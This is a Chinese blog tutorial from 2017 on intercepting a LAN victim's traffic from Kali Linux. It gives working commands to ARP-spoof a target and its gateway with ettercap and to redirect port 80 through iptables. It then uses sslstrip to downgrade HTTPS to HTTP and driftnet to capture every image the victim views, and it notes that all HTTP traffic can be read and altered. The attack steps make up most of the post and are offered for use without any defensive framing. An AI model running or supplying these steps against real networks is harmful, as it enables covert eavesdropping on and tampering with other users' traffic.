ettercap的中间人欺骗+sslstrip过滤掉https协议

   环境准备:kali系统

  因为kali系统自带ettercap,比较方便, 不需要安装

  ifcofing命令查看当前网关 ,当前的IP是: 172.16.42.1

  查找局域网所有主机

  通过netdiscover获取到当前目标IP:172.16.42.131  

  启动ettercap 

  启动ettercap , wlan0为网卡端口, -T为文字显示, -M art:remote为双向arp欺骗, /172.16.42.131//为攻击的目标机器IP , /172.16.42.1//为网关地址(注, 在不同系统和不同的ettercap版本中, 参数可能不一样, 具体要看你的环境和ettercap版本)

ettercap -i wlan0 -T -M arp:remote /172.16.42.131// /172.16.42.1//

  过滤https协议成http

  重新打开一个命令行窗口,分别执行下面三个命令行,

  echo 1 > /proc/sys/net/ipv4/ip_forward   开启数据重定向

  iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 10000  开启80端口的数据转发到10000端口  

  sslstrip -l 10000  执行sslstrip欺骗,把网页中的https协议转换为http协议

echo 1 > /proc/sys/net/ipv4/ip_forward 
iptalbes -t nat -F //清除类型为nat的iptables
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -l 10000
iptables -t nat -L //查看iptables列表是否生效






  当用户浏览的网页中包含https协议,会被转化为http协议的请求


  但是sslstrip也不是万能的, 假如网页中没有https, 但是js代码绑定了跳转到https的协议请求的事件, , 那么sslstrip就失效了


  如果用户打开网页的时候请求就是https, 会导致证书认证失败, 网页一直打不开


  获取所有的图片信息


  执行arp欺骗以后, 目标机器所有的流量都会走我们的主机, 通过监听wlan0网卡, 我们可以获取和篡改目标机器的所有http请求数据和内容


  启动driftnet监听wlan0端口, 查看所有的浏览图片数据, 所有的浏览图片,尽收眼底:




driftnet -i wlan0






 


作者: NONO 
出处:http://www.cnblogs.com/diligenceday/ 
企业网站:http://www.idrwl.com/	
开源博客:http://www.github.com/sqqihao
QQ:287101329 
微信:18101055830 







            

            
posted @ 
2017-12-22 13:05 
方方和圆圆 
阅读(8106) 
评论(0编辑 
收藏 
举报


        

	    
	    
    









    
    

    
    

    

        

    

        

            
                
                
            
        

    

        

            
                
            
        

    

    

    



	

	

	
	

	

	

	





    

        






    再过一百年, 我会在哪里?